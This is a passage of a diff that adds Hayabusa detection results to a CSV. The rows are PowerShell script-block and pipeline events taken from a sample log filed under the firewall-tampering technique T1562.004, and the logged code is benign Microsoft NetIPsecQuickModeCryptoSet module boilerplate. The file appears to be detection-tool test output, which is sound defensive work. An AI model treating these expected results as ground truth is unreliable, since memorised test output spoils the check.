)) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecQuickModeCryptoSet' -Alias '*' function Copy-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.329 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecQuickModeCryptoSet' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.329 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecQuickModeCryptoSet' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.330 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.330 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.331 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecQuickModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.331 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecQuickModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.331 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecQuickModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.332 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecQuickModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
